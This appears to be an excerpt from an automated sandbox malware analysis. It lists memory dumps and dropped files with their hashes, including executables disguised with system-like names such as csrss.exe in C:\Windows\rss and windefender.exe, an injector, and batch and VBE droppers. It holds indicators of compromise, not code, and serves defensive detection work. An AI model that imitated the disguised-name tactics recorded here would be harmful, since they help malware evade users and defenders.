SHA512 55425dc95161e627e19e17f1bb910f958dade0c2b12da5eaad31159f0e2dc5217ff293c52f39d860d399807d5b4a814f1bb24376c58b40cc171d298282052049

memory/388-74-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/3500-73-0x0000000000400000-0x0000000000649000-memory.dmp

memory/388-76-0x00000000005E0000-0x0000000000616000-memory.dmp

memory/3500-78-0x0000000000400000-0x0000000000649000-memory.dmp

memory/3500-79-0x0000000000400000-0x0000000000649000-memory.dmp

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/4116-100-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3500-103-0x0000000000400000-0x0000000000649000-memory.dmp

memory/4116-106-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

MD5 3882d53bb4fa9b34225dcd65476dbfea
SHA1 749ec3be884d1026e55576ff382e5f8bb5a71cb8
SHA256 bb9806e7e371d593ebff525132d9e16107adaa58cd04b1b0fb37230366b64e98
SHA512 25927023a8c74ec7a22f2d8e0406400a92af2e951169621ca3af7191cc8250e02ef443b968a994210615df0907c82e5091be480305d8c5ea796a871912d5f922

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

MD5 e7323dbd6ea98dfdaeb364570ac5f374
SHA1 7c9a750c958aa9ee8554a1bbd3e5d9c2ccd9ebab
SHA256 04513f58c810278c4fcb89a532fb8b3460cb010979257d30d6ceb5f4df06bab8
SHA512 183d7f064c6892f303753b92cec34822c50cbeec6171a54e937b07c5c08b3fe1a2920cebf782cbd7272d63ec52bd91a6363a68fc782b4417fcbd7e25257eeda9

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 b7865292d9c37de3f9306365814344cc
SHA1 b5f59e17c84a7ba0b2f60cd7da78e9d8e36c758e
SHA256 f9e8294aea84cf597ddbadd29e63a3f470e1a98da704a755d6cd3b936f0f726b
SHA512 f4dd38f1c0e718ea23e28bd8d6d4b97a70582518b669e143f9708fff33a6afdbc45d75841be7bca9bcc53f1e2b4502e3bba4420338963dee7642bf0e0a5ec1bd

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 466ecbc5ca2ad88dc3b4266a305c46a0
SHA1 b4bb744f6d7d1b40108e9b49b779fe5408dcf2e8
SHA256 ba43638566c64d2a62e3affda029e768ce1acdbf11dbe8951fde17f07281566c
SHA512 374da55d1efd703225618cc58c4a33191d8477d04dbea607fccb299115f6343b6450f3430e5484a6b527ab77cc342aab0d397ee87151d752d3e24734bff52a28

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxjarbex.uw3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\F88E.exe

MD5 f00fc30d862188dde528abbc6b596b1a
SHA1 64d0811a72ce0ed361a3420cd53e272ca76a7519
SHA256 6841a8d26ef03994c271eabe988a6d548345352fc7e944c07556c649439cb592
SHA512 ff8e37e9bb113eba4d8a27cb70a901606cdb079902addb8e395d4a8f9e4e7a56f43cd13a9d353b1758672c56cffd8aaa1d0d8560b666f7f1fc334964101cdcca

C:\Users\Admin\AppData\Local\Temp\F88E.exe

MD5 9dae0e68915238849a0fa9df128f3ab4
SHA1 a1d1654fdb9d045d91c9399af62a0c7609f0e2fb
SHA256 c0c87892ac16ddc0d66cceffe4cf574aa9d07516fb7e07bc32f4b80d542ee03b
SHA512 8b9330bbde4a9327b96b6fa1cfcab7f4b040b706ad75f99c4a248cc015dee1cffdb708d095f6eb94e2b13ea34fd58c4de7f47b35780abc201cd334ddd4c089d9

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 56dac0c9a7abb2e3ff23131d40981cea
SHA1 cf8ef3fd440de49cd411569b3647e1b679d6daec
SHA256 fc869d43604b2a00ba8b7f372d9d7261bb6e6e72b4ad1f729f1cbcfd34d2b3df
SHA512 1202e19b14f519262680342a4acc15e1124370d9bf5b8d8d8024c195d323a6bcd580712143cdebbdf4a7a6e5ee3684796896a7845b711a9a3ee225147fc05b5e

C:\Users\Admin\AppData\Local\Temp\DBD.exe

MD5 a5aa54a5dc4ff7156be31f9d45974b72
SHA1 c832ab6f3cf67feede0736a0151c46a96146511b
SHA256 972a6f8ef6ae10efa416e366916df1502188c48c66cd72e6135965d94349d78f
SHA512 03010898fd05b97677e5c01cbaf0e74c5931f47672376e3075a0d47926bca1acd0011b4a8178344d4970a322548a4bb5c6a2fd9781209253af61c9f426efa3c6

C:\Users\Admin\AppData\Local\Temp\DBD.exe

MD5 30c8e825e7a455fa783bb3406d35ac43
SHA1 adc8ac816c6d79fc1d6362717a410364b0e94376
SHA256 4d9c4fe34f11890db331ecdd6cb2b4eef95eb63ef6734004c2ace6ba2706c040
SHA512 d4b9c459ceac01779387a6c00d1ac5edf0ca96955e56ef149a0933c624fa8db4e4f9bd2fcd2d72567eb9dd712fa8581900eab4ef7b57b1ea21b3a0c7cfd54cdd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d2d0070d6238f7bdd91b8d0b26e9b1a8
SHA1 b2a8934734dcbd5617407914dde85d016d5745d0
SHA256 e5757dbd9cf7c4d41fbd87d9a9b708d352109bb7d18645d09f24f71eef31d958
SHA512 5652b890033a85f9abc202d99b87fce115147c36e9ede148d1522231b72fd6d1405d5f6245088982c63d5e6b8d71f1115157438d8e54049c8df7c85d0570fa49

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a22e9f55c7fad9fe3a587b8362ef4f27
SHA1 b5ff7c697a38969e115928302f64da8f412b7912
SHA256 52edbfd5f8e6bc0653bced5ae77af65b15459b8cb2f88cade21f6a7afe37d12c
SHA512 81c32ec149fa5b9c83ee57597ec1c9d24ca0b5a5b839b6cdf099b70dbbbe544a30ab9d320949506ee128d741909ab26a981bbba74bf8b637ae34a1a65b9a8f6d

C:\Windows\rss\csrss.exe

MD5 4e1f7c6af1652e7bc059064547f141bc
SHA1 94a97f8e05c08236da2b769d54bf33280178d3ed
SHA256 36fc1e92f1f3af429651720b8e7ea5eb1ca2e83c5c74e233543275c09b57eb20
SHA512 f30069ed3c482cc15d5f5be84ab2b1fda85e151c2312b90b6e9019dcd24e2930ca1a09b1a4ba2a2f910e0fad8cf2a7dfe3bf4f42a8d247609bae540bb233c652

C:\Windows\rss\csrss.exe

MD5 e0e7ec5e6d3d82af46d75eefabd40073
SHA1 8919251b8a6e42b886a4e87bb7c7e8bb6d2534e9
SHA256 ae361995ab8d3160af4dcbdc9f0733bbcab6685edf3948f10ec514f8d8844438
SHA512 19d3f33f7431830a2e11f861a8aa7645e25ffa15a8956d9dcbd81fe269ec55fe9f335a1636f5f70f259bc9b746e87536e2b1369b32baa3df76ab2957e4d08276

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6d0a02f17cf7de01d2c9a515cf9aadc7
SHA1 6315fed881ababf93995293d12c6af01898fdcb5
SHA256 ddbd55f95723a7fcc0b21024c075058d264c2f9e1aaa74e5b3a5838a212c4eb8
SHA512 651cb1afb3feaf862ac64690ca0bb408c5715cb21304ad77de5b61e9ea4d4e4a4b702b8317e3a0f72563a6c232c8bf519b12bfba3a32ae4a3869b5351fdf8632

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6f3dccff57bc5aff185aca77e00ff5fb
SHA1 1ec7526e90893871da011486ab2528dc8b8f8fb0
SHA256 964c27c8bc8178dffba23c2ef4b46adf7d33f896948e28f2e5a8e4ff803ee44c
SHA512 18ea93f158eb1dcc9004d8e937febac614c7f9698f6f28b7e1dbdcce26f7100e7167a71a4f4692ce9409926c496297907186797a2dc938aebfa79fdfa6424231

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d800345005c3b4d0da179a1254e0673e
SHA1 7e9d19b17b69d2a1c71b602cfaa5224fbac7cfa9
SHA256 914ee6fd2ddafbefe9f02baba2569d4f47cb0cc6498ef56ff350729fccc30ab3
SHA512 8b4fa1a5de3458fc6a09461cdbbba2898c56947d06841e04acf051c29d7bb73e5376bd9f4fab9aa2561975bd180bae607597f09792e4e9600e735bc54fb85da5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\5343.exe

MD5 f01f17070d6c361d7cf2fccacba7a82c
SHA1 a0b5ba4309eeb8039bb7ad8b4292118ff66c01dc
SHA256 21a1d9069914a274913301f71f4ddb4b991a16e13f99bbabeb6dc71c7ff8655a
SHA512 72858c907d1558befca030650b6d0abb6cc0eee7b67edd112f0fcbcb55283ae450de4777a8839993a214da1c4f78ba251ba3d6b2b7b02973347cff207601b49a

C:\Users\Admin\AppData\Local\Temp\5343.exe

MD5 769e796d195a615491199dcc178f39d7
SHA1 cd0f2a19ab3a01baa8b2da992d3f2902c60f16cc
SHA256 1edea0c154bc699abb18a119be5a97d4fed233b41e6bc14d2a6c8583a90089b8
SHA512 ce93ba5cdc766acf9d1aa517e63e0477af9ecc743b72a098f5e00668d5f92ab59fff031224d6c176359b06885d22bb10339c613accdd435ffc76b78abe9f3e9f

C:\Windows\windefender.exe

MD5 d52a110e8a644ad42e0d39987f44104c
SHA1 902cc386d545ed58a7f64203d7ab21f2dbe6c210
SHA256 f578866815f89accb31570f45c894052511294bb38ef813bcd32e4ec24e653af
SHA512 d194af10513ee157f7fd23c2a23c030b11a9aefc09ed90e0f011a3df66c107859ea8b016b0c26b0db2881d6f7e0e470d3e146c2b0dc32636748979894120947e

C:\Windows\windefender.exe

MD5 06a3afb990a7d4ed8d740fa739415939
SHA1 c543f51909015a789bf199f4beb9285a37c04eec
SHA256 62d8e9ed58e04749e3e234b807dfef245debdfc6242589b97cd5371c6d2b3562
SHA512 f58cb43b92dfe4469abda5d07b7e4f305ead4f40664029a98c5cd03d1959d465e15d9a23e5d31e0bafc2ebdfda6096c7d2083258fce47fa90612db6105e8f0f2

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Users\Admin\AppData\Local\Temp\611E.exe

MD5 20de31c5226fde5ddae74894f2e3f618
SHA1 03b514401eb1c179f4eec5211f646148de8b0426
SHA256 6d5060a8430247a2500bd235d4588710f5ae1c3f8fa48b146914c672f8cc394a
SHA512 aa43a6436aa1dd518f36281b83e25f09d52e72d2f9df316eda8f32ec11296272acfa257c1d37b5a46a72b047fb14f1a25637e5923de7aa30240be78e888a5039

C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe

MD5 49ca6dc4705e383d4162260db0d5bf84
SHA1 b6e1e8f086245aa07a5c2d352e69a9a2fa5c460d
SHA256 6fe6c22a6b3c1de777b489d553073631d8c7e2b76738b9700198876521ff7ba4
SHA512 684c61fba0a98723a41504bc1e7ce4debe0a785a0eb78f13e1cb291d77aa95aa4e82a80166060be8319a35785f6f710dbbaabf710545c4b9556440477b1bde7f

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

C:\containerProviderhost\SSJnjC24t.bat

MD5 08387ad767f4e9e7c670d0eeafe302ef
SHA1 4ba6af1e421c43ee693b6537a06639c3f50a7abf
SHA256 2bdca7aa3916a7a0bb6e1b22d895b9696f14c1512554a7af00d5dbc048e43672
SHA512 94f7743519a768d233130ba4d2b3ccf62f67f0999382cc984051fe5f8ae02deb17926e01482d1e763447d3f54fb3b548ee241d7a40cf34d45d7e968ce8f6975f

C:\containerProviderhost\runtimenetSvc.exe

MD5 92bf2463d72a410bf291db2bbb0176f5
SHA1 bcc41c9861ce8ad99e2d951c49c50429b4dc8d7f
SHA256 92883022e82b89d32c6936ad8f94a35ac1eb0c2313656029977aec1b4973b808
SHA512 c803d47482aec6ac9c74ee20b401f03f3f2d4a1cc80770e1cf70319cbb7da715ee204cb15e585dbd6d9df0d9fb81254fdb6f6dae5d2147cbbbd85c3cf5b8d300

C:\Users\Admin\AppData\Local\Temp\FSRA6W5YHr.bat

MD5 f729ebef6ff1fe529297eaa249e6de7a
SHA1 44b6c28705981eebdce8fcd7ba51d9413b2e4fbe
SHA256 9ef5b5fb4391d4125e926d464e664783fa7e283bf293e2c42d812c9d5e56e4bd
SHA512 6f27be6fb0f348d38b1c673a84e4ff6b276d2f71095aef1f45ae73924ddf905040a1861947756714d0bb191e3d54f4ce8de6ad5aed3899dc94843eee0536322b